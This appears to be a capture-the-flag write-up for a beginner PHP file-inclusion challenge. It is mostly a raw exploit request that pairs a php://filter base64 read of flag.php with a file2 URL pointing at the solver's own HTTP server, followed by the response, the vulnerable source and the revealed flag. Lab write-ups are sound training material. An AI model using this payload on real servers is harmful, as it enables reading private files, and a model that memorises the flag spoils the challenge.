攻防世界-adworld-fileclude-新手
34最佳Writeup由 Haojie 提供WriteUP
收藏
反馈
难度:1
方向:Web
题解数:13
解出人数:2346
题目来源: CTF
题目描述:
好多file呀!
题目场景:
100%
倒计时: 3时59分27秒
┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/fileinclude]
└─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.10.140 - - [20/Nov/2022 17:18:39] "GET / HTTP/1.1" 200 -
http://61.147.171.105:60895/??file1=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php&file2=http://127.0.0.1:5555/file2.php
GET /?file1=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php&file2=http://x.x.x.x:5555/file2.php HTTP/1.1
Host: 61.147.171.105:60895
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
HTTP/1.1 200 OK
Date: Sun, 20 Nov 2022 10:16:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.23
Vary: Accept-Encoding
Content-Length: 2529
Connection: close
Content-Type: text/html
WRONG WAY!<code><span style="color: #000000">
<span style="color: #0000BB"><?php<br /></span><span style="color: #007700">include(</span><span style="color: #DD0000">"flag.php"</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />if(isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file1"</span><span style="color: #007700">]) && isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file2"</span><span style="color: #007700">]))<br />{<br /> </span><span style="color: #0000BB">$file1 </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file1"</span><span style="color: #007700">];<br /> </span><span style="color: #0000BB">$file2 </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file2"</span><span style="color: #007700">];<br /> if(!empty(</span><span style="color: #0000BB">$file1</span><span style="color: #007700">) && !empty(</span><span style="color: #0000BB">$file2</span><span style="color: #007700">))<br /> {<br /> if(</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$file2</span><span style="color: #007700">) === </span><span style="color: #DD0000">"hello ctf"</span><span style="color: #007700">)<br /> {<br /> include(</span><span style="color: #0000BB">$file1</span><span style="color: #007700">);<br /> }<br /> }<br /> else<br /> die(</span><span style="color: #DD0000">"NONONO"</span><span style="color: #007700">);<br />}</span>
</span>
</code>PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXtmYjJhN2M1OWFjMmFkYzI2MjNmYmQwYjEwMjIxODgzNX0=
// $flag = cyberpeace{fb2a7c59ac2adc2623fbd0b102218835}
<?php
echo "WRONG WAY!";
// $flag = cyberpeace{fb2a7c59ac2adc2623fbd0b102218835}